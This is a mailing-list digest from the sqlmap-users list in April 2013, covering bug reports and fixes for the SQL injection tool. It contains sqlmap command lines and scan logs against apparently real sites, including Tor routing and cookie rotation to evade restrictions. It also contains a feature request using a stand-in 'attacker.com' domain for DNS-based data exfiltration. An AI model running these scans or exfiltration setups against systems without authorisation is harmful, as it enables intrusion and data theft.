> > >         >     Cheers,
> > >         >
> > >         >     Dirk
> > >         >
> > >         >
> > >         >
> > >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > >         >     > Hi.
> > >         >     >
> > >         >     > And this is also happening if you are skipping "Cookie:
> > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > >         >     >
> > >         >     > Kind regards,
> > >         >     > Miroslav Stampar
> > >         >     >
> > >         >     >
> > >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
> <mailto:
> > sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> > >         >     >
> > >         >     >
> > >         >     >     Hi folks,
> > >         >     >
> > >         >     >     .... that doesn't work for me. It always uses the
> > cookie supplied
> > >         >     >     (below in $REQUEST, or if I omit the line in
> > $REQUEST the one
> > >         >     >     from the 1st server reply is being used)
> > >         >     >
> > >         >     >     So what is wrong in here:
> > >         >     >
> > >         >     >     cd
> > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > >         >     >       --level=2 --risk=2 -r $REQUEST
> > >         >     >
> > >         >     >     The content of the file $REQUEST is:
> > >         >     >
> > >         >     >     POST <URL> HTTP/1.1
> > >         >     >     Host: <HOST>
> > >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT
> 5.2;
> > en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> > >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> > http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> > >         >     >     Accept:
> > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > >         >     >     Accept-Language: en-US,en;q=0.5
> > >         >     >     Accept-Encoding: gzip, deflate
> > >         >     >     Referer: <Referer>
> > >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > >         >     >     Connection: keep-alive
> > >         >     >     Content-Type: application/x-www-form-urlencoded
> > >         >     >     Content-Length: 67
> > >         >     >
> > >         >     >     <abunchofpostparams>
> > >         >     >
> > >         >     >
> > >         >     >     No hints that cookie-file is not in correct format
> > (I've been through this,
> > >         >     >     at least I think I so ;) ).
> > >         >     >
> > >         >     >     Any insight would be much appreciated.
> > >         >     >
> > >         >     >
> > >         >     >     Cheers,
> > >         >     >
> > >         >     >     Dirk
> > >         >     >
> > >         >     >
> > >         >     >
> >
> ------------------------------------------------------------------------------
> > >         >     >     Precog is a next-generation analytics platform
> > capable of advanced
> > >         >     >     analytics on semi-structured data. The platform
> > includes APIs for building
> > >         >     >     apps and a phenomenal toolset for data science.
> > Developers can use
> > >         >     >     our toolset for easy data analysis & visualization.
> > Get a free account!
> > >         >     >
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > >         >     >     _______________________________________________
> > >         >     >     sqlmap-users mailing list
> > >         >     >     sql...@li... <mailto:
> > sql...@li...> <mailto:
> > sql...@li... <mailto:
> > sql...@li...>> <mailto:
> > sql...@li... <mailto:
> > sql...@li...> <mailto:
> > sql...@li... <mailto:
> > sql...@li...>>>
> > >         >     >
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > >         >     >
> > >         >     >
> > >         >     >
> > >         >     >
> > >         >     > --
> > >         >     > Miroslav Stampar
> > >         >     > http://about.me/stamparm
> > >         >
> > >         >
> > >         >
> > >         >
> > >         > --
> > >         > Miroslav Stampar
> > >         > http://about.me/stamparm
> > >
> > >
> > >
> > >
> > >     --
> > >     Miroslav Stampar
> > >     http://about.me/stamparm
> > >
> > >
> > >
> > >
> > > --
> > > Miroslav Stampar
> > > http://about.me/stamparm
> >
> >
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 4
> Date: Mon, 15 Apr 2013 11:46:21 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
> clean_filesystem
> To: Brandon Perry <bpe...@gm...>
> Cc: sqlmap users <sql...@li...>
> Message-ID:
> <CA+9yoX3RNQDm=PqT...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Brandon.
>
> Thank you for your patch and find it now included [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>
>
> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...
> >wrote:
>
> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
> > call when self.output_directory is NoneType and clean_system() is called.
> >
> > --
> > http://volatile-minds.blogspot.com -- blog
> > http://www.volatileminds.net -- website
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
> >
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 5
> Date: Mon, 15 Apr 2013 12:19:13 +0200
> From: Dirk Wetter <sp...@dr...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID: <516...@dr...>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Hi Miroslav,
>
> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
> > Hi Dirk.
> >
> > Now that crash should be "patched".
> >
> > Could you please retry it now and say if the latest revision suits your
> needs?
>
> cool, thx. Works!
>
> However (sorry):
>
> One needs to omit the cookie in the request header, otherwise it just uses
> the one
> supplied by the request.
>
> Then: It doesn't change the cookie. Maybe I was interpreting that not
> correctly
> but my point was using the load-cookies option to direct sqlmap to change
> cookies once in a while (whenever that's gonna be). This is to circumvent
> restrictions one can encounter otherwise....
>
> Cheers,
>
> Dirk
>
>
> >
> > Kind regards,
> > Miroslav Stampar
> >
> >
> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
> >
> >
> >
> >     On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> >     > Nevertheless, with the latest commit that check should be
> "neutralized" now. Could you please retry it now?
> >
> >     thx, Miroslav.  I tried (b6fee63) but this time the cookie parser
> lib hiccups, using the same file:
> >
> >     /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning:
> cookielib bug!
> >     Traceback (most recent call last):
> >       File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
> >         assert domain_specified == initial_dot
> >     AssertionError
> >
> >       _warn_unhandled_exception()
> >     [11:13:26] [CRITICAL] there was a problem loading cookies file
> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
> >
> >     the 999.. looks strange to me.
> >
> >     >
> >     >
> >     > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...> <mailto:
> mir...@gm... <mailto:mir...@gm...>>> wrote:
> >     >
> >     >     Hi Dirk.
> >     >
> >     >     Well, I would say that you have an expired cookie. Do you see
> that value 0? That value should be a valid UNIX time representing time of
> cookie expiration. Also, I've just tested that cookie of yours and sqlmap
> says: "[WARNING] cookie '....' has expired"
> >     >
> >
> >     that's true but IMO 0 represents just a session cookie. Example:
> >
> >     prompt% wget -q -O /dev/null --keep-session-cookies
> --save-cookies=/dev/stdout bing.com <http://bing.com>
> >     # HTTP cookie file.
> >     # Generated by Wget on 2013-04-15 11:23:13.
> >     # Edit at your own risk.
> >
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      SRCHD   D=2781203&MS=2781203&AF=NOFORM
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      OrigMUID
> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      MUID    333995A69E06630B2EB491169F016314
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _SS     SID=B954CB7EDF8643CABAD8013F27A241E7
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _HOP
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _FS     NU=1
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      _FP     EM=1
> >     www.bing.com <http://www.bing.com>    FALSE   /       FALSE
> 1429089794      SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> >     www.bing.com <http://www.bing.com>    FALSE   /       FALSE
> 1429089794      MUIDB   333995A69E06630B2EB491169F016314
> >
> >     prompt%
> >
> >     Same parser problem btw if I edit the cookie file and put 1429089794
> unix time instead of 0 in there.
> >
> >     Ok: With the prev rev  ed5599f it reads this file ok (no session
> cookies but cookies w/ expiration date) and uses the last
> >     cookie only for the first 120 tries.
> >
> >     Cheers, Dirk
> >
> >
> >     >
> >     >     Kind regards,
> >     >     Miroslav Stampar
> >     >
> >     >
> >     >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>>> wrote:
> >     >
> >     >
> >     >         Hi Miroslav,
> >     >
> >     >         thx for your prompt answer.
> >     >
> >     >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> >     >         > Hi Dirk.
> >     >         >
> >     >         > Could you please get the latest revision and retry it
> again?
> >     >         ed5599f: almost the same: with cookie in the header sqlmap
> takes only this one.
> >     >         The slight difference seems to be that in the case where I
> didn't supply a cookie
> >     >         sqlmap doesn't use any cookie at all, i.e. now not the one
> from the server anymore.
> >     >         >
> >     >         > There was a situation where info messages have been
> wrongly written that original response contained Set-Cookie in situations
> like yours.
> >     >         >
> >     >         > In case that everything stays as it is, I'll need to ask
> you to provide more details. For example, cookie file would be great.
> >     >
> >     >         sure, here you go:
> >     >
> >     >         --snip
> >     >         # Netscape HTTP Cookie File
> >     >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t
> JSESSIONID  \t  <Cookie>
> >     >         [..]
> >     >         --snap
> >     >
> >     >         They are all session cookies. For easier reading here I
> put some blanks in the line
> >     >         above, in "cookie-file" there aren't any though. Cookies
> were generated with
> >     >         stompy and a shell script (looks he same as with
> >     >         wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >     >
> >     >         Again: sqlmap doesn't hiccup/complain while eating my
> cookies file ;-)
> >     >
> >     >         >
> >     >         > Also, please make sure that the cookie file contains
> proper cookie(s) - domain name should be the same as a domain of target,
> cookie needs to have a proper valid time, etc.
> >     >
> >     >         see above.
> >     >
> >     >         Cheers,
> >     >
> >     >         Dirk
> >     >
> >     >         >
> >     >         >
> >     >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> >     >         >
> >     >         >     Hi Miroslav,
> >     >         >
> >     >         >     yes unfortunately.
> >     >         >
> >     >         >     If I omit the cookie line in the request header
> completely, sqlmap
> >     >         >     seems to take the first cookie issued by the server
> with set-cookie (and
> >     >         >     put's it silently in).
> >     >         >
> >     >         >     Cheers,
> >     >         >
> >     >         >     Dirk
> >     >         >
> >     >         >
> >     >         >
> >     >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> >     >         >     > Hi.
> >     >         >     >
> >     >         >     > And this is also happening if you are skipping
> "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original
> request?
> >     >         >     >
> >     >         >     > Kind regards,
> >     >         >     > Miroslav Stampar
> >     >         >     >
> >     >         >     >
> >     >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>> <mailto:
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>>> wrote:
> >     >         >     >
> >     >         >     >
> >     >         >     >     Hi folks,
> >     >         >     >
> >     >         >     >     .... that doesn't work for me. It always uses
> the cookie supplied
> >     >         >     >     (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> >     >         >     >     from the 1st server reply is being used)
> >     >         >     >
> >     >         >     >     So what is wrong in here:
> >     >         >     >
> >     >         >     >     cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> >     >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> >     >         >     >       --threads=8 -v 6
> --load-cookies=$WD/cookie-file \
> >     >         >     >       --level=2 --risk=2 -r $REQUEST
> >     >         >     >
> >     >         >     >     The content of the file $REQUEST is:
> >     >         >     >
> >     >         >     >     POST <URL> HTTP/1.1
> >     >         >     >     Host: <HOST>
> >     >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows
> NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> >     >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> >     >         >     >     Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> >     >         >     >     Accept-Language: en-US,en;q=0.5
> >     >         >     >     Accept-Encoding: gzip, deflate
> >     >         >     >     Referer: <Referer>
> >     >         >     >     Cookie:
> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> >     >         >     >     Connection: keep-alive
> >     >         >     >     Content-Type: application/x-www-form-urlencoded
> >     >         >     >     Content-Length: 67
> >     >         >     >
> >     >         >     >     <abunchofpostparams>
> >     >         >     >
> >     >         >     >
> >     >         >     >     No hints that cookie-file is not in correct
> format (I've been through this,
> >     >         >     >     at least I think I so ;) ).
> >     >         >     >
> >     >         >     >     Any insight would be much appreciated.
> >     >         >     >
> >     >         >     >
> >     >         >     >     Cheers,
> >     >         >     >
> >     >         >     >     Dirk
> >     >         >     >
> >     >         >     >
> >     >         >     >
> ------------------------------------------------------------------------------
> >     >         >     >     Precog is a next-generation analytics platform
> capable of advanced
> >     >         >     >     analytics on semi-structured data. The
> platform includes APIs for building
> >     >         >     >     apps and a phenomenal toolset for data
> science. Developers can use
> >     >         >     >     our toolset for easy data analysis &
> visualization. Get a free account!
> >     >         >     >
> http://www2.precog.com/precogplatform/slashdotnewsletter
> >     >         >     >     _______________________________________________
> >     >         >     >     sqlmap-users mailing list
> >     >         >     >     sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>>>
> >     >         >     >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >     >         >     >
> >     >         >     >
> >     >         >     >
> >     >         >     >
> >     >         >     > --
> >     >         >     > Miroslav Stampar
> >     >         >     > http://about.me/stamparm
> >     >         >
> >     >         >
> >     >         >
> >     >         >
> >     >         > --
> >     >         > Miroslav Stampar
> >     >         > http://about.me/stamparm
> >     >
> >     >
> >     >
> >     >
> >     >     --
> >     >     Miroslav Stampar
> >     >     http://about.me/stamparm
> >     >
> >     >
> >     >
> >     >
> >     > --
> >     > Miroslav Stampar
> >     > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
>
>
> ------------------------------
>
> Message: 6
> Date: Mon, 15 Apr 2013 14:01:01 -0700
> From: <co...@5i...>
> Subject: [sqlmap-users] --host parameter
> To: sql...@li...
> Message-ID:
> <
> 201...@em...
> >
>
> Content-Type: text/plain; charset="utf-8"
>
> Hello,
> the --host doesn't work as expected, or I am doing something wrong:
>
>
> this works as expected:
>
> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:57:15
>
> [23:57:15] [INFO] testing connection to the target URL
> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> [23:57:15] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [23:57:16] [INFO] target URL is stable
> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> [23:57:16] [INFO] GET parameter 'id' is dynamic
> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> might be injectable (possible DBMS: 'MySQL')
> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>
>
> ....
>
>
> this doesn't work as expected:
>
>  ./sqlmap.py --host='i.csland.ro'
> --url='http://188.240.236.15/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:58:03
>
> [23:58:03] [INFO] testing connection to the target URL
> [23:58:03] [CRITICAL] page not found (404)
> it is not recommended to continue in this kind of cases. Do you want to
> quit and make sure that everything is set up properly? [Y/n]
> [23:58:05] [WARNING] HTTP error codes detected during run:
>
> ............
>
>
> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>
> Thanks.
>
>
>
>
> ------------------------------
>
> Message: 7
> Date: Tue, 16 Apr 2013 09:12:05 +1100
> From: ???????? ?????? <vo...@s2...>
> Subject: [sqlmap-users] Sqlmap and direct connect error
> To: sql...@li...
> Message-ID: <C59...@s2...>
> Content-Type: text/plain; charset=us-ascii
>
> Hi!
>
> This bug detected if add direct param.
>
> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables
> --exclude-sysdbs
>
>
> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-de99717
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -d
> **************************************************** -u
> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> --exclude-sysdbs
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
>   File "sqlmap.py", line 87, in main
>     start()
>   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> start
>     action()
>   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>     setHandler()
>   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> setHandler
>     conf.dbmsConnector.connect()
>   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in
> connect
>     self.connector = pymysql.connect(host=self.hostname, user=self.user,
> passwd=self.password, db=self.db, port=self.port,
> connect_timeout=conf.timeout, use_unicode=True)
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
> line 93, in Connect
>     return Connection(*args, **kwargs)
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 584, in __init__
>     self._connect()
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> line 739, in _connect
>     sock.connect((self.host, self.port))
>   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
> connect
>     raise GeneralProxyError((5, _generalerrors[5]))
> GeneralProxyError: (5, 'bad input')
>
>
>
>
> ------------------------------
>
> Message: 8
> Date: Tue, 16 Apr 2013 14:19:18 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] --host parameter
> To: co...@5i...
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi.
>
> Thank you for your report and find it fixed with the latest commit [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
>
>
> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:
>
> > Hello,
> > the --host doesn't work as expected, or I am doing something wrong:
> >
> >
> > this works as expected:
> >
> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
> >
> >     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> > takeover tool
> >     http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility to
> > obey all applicable local, state and federal laws. Developers assume no
> > liability and are not responsible for any misuse or damage caused by
> > this program
> >
> > [*] starting at 23:57:15
> >
> > [23:57:15] [INFO] testing connection to the target URL
> > [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> > [23:57:15] [INFO] testing if the target URL is stable. This can take a
> > couple of seconds
> > [23:57:16] [INFO] target URL is stable
> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> > [23:57:16] [INFO] GET parameter 'id' is dynamic
> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> > might be injectable (possible DBMS: 'MySQL')
> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
> >
> >
> > ....
> >
> >
> > this doesn't work as expected:
> >
> >  ./sqlmap.py --host='i.csland.ro'
> > --url='http://188.240.236.15/index.php?id=0'
> >
> >     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> > takeover tool
> >     http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility to
> > obey all applicable local, state and federal laws. Developers assume no
> > liability and are not responsible for any misuse or damage caused by
> > this program
> >
> > [*] starting at 23:58:03
> >
> > [23:58:03] [INFO] testing connection to the target URL
> > [23:58:03] [CRITICAL] page not found (404)
> > it is not recommended to continue in this kind of cases. Do you want to
> > quit and make sure that everything is set up properly? [Y/n]
> > [23:58:05] [WARNING] HTTP error codes detected during run:
> >
> > ............
> >
> >
> > Of course i.csland.ro resolves to 188.240.236.15. Any idea?
> >
> > Thanks.
> >
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 9
> Date: Tue, 16 Apr 2013 14:33:33 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Sqlmap and direct connect error
> To: ???????? ?????? <vo...@s2...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
> Content-Type: text/plain; charset="koi8-r"
>
> Hi Vladimir.
>
> Find it "patched" with the latest commit [1]. Basically, those combinations
> should not be allowed (-d and --url; -d and --tor; etc.) and now we've
> added new option validation checks for this kind of cases.
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a
>
>
> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:
>
> > Hi!
> >
> > This bug detected if add direct param.
> >
> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables
> > --exclude-sysdbs
> >
> >
> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
> retry
> > your run with the latest development version from the GitHub repository.
> If
> > the exception persists, please send by e-mail to '
> > sql...@li...' or open a new issue at '
> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> > text and any information required to reproduce the bug. The developers
> will
> > try to reproduce the bug, fix it accordingly and get back to you.
> > sqlmap version: 1.0-dev-de99717
> > Python version: 2.7.3
> > Operating system: posix
> > Command line: sqlmap.py -d
> > **************************************************** -u
> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> > --exclude-sysdbs
> > Technique: None
> > Back-end DBMS: MySQL (identified)
> > Traceback (most recent call last):
> >   File "sqlmap.py", line 87, in main
> >     start()
> >   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> > start
> >     action()
> >   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in
> action
> >     setHandler()
> >   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> > setHandler
> >     conf.dbmsConnector.connect()
> >   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38,
> in
> > connect
> >     self.connector = pymysql.connect(host=self.hostname, user=self.user,
> > passwd=self.password, db=self.db, port=self.port,
> > connect_timeout=conf.timeout, use_unicode=True)
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
> > line 93, in Connect
> >     return Connection(*args, **kwargs)
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> > line 584, in __init__
> >     self._connect()
> >   File
> >
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
> > line 739, in _connect
> >     sock.connect((self.host, self.port))
> >   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
> > connect
> >     raise GeneralProxyError((5, _generalerrors[5]))
> > GeneralProxyError: (5, 'bad input')
> >
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 10
> Date: Tue, 16 Apr 2013 23:26:39 +0200
> From: buawig <bu...@gm...>
> Subject: [sqlmap-users] feature request: offline mode for
> --dns-domain?
> To: SqlMap List <sql...@li...>
> Message-ID: <516...@gm...>
> Content-Type: text/plain; charset=UTF-8
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> Hi,
>
> in cases where sqlmap is run against targets on internal networks it
> would be great if one could tell sqlmap to simply proceed without
> expecting incoming DNS requests, because sqlmap can not be executed
> directly on the DNS server (which can't reach the target, but the
> target can reach the DNS server).
>
> For me it would be enough to simply run something like
> - -u ... --dns-domain=attacker.com --dns-port=0
> (--dns-port does not exist [yet])
>
> to let sqlmap know that it doesn't need to start a DNS listener.
>
> I would then collect and decode the DNS querries on the DNS server
> manually, but I could also envision running a second sqlmap instance
> on the DNS server with --dns-domain (but without -u) doing that job.
>
> -----BEGIN PGP SIGNATURE-----
>
> iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p...
 
[truncated message content]

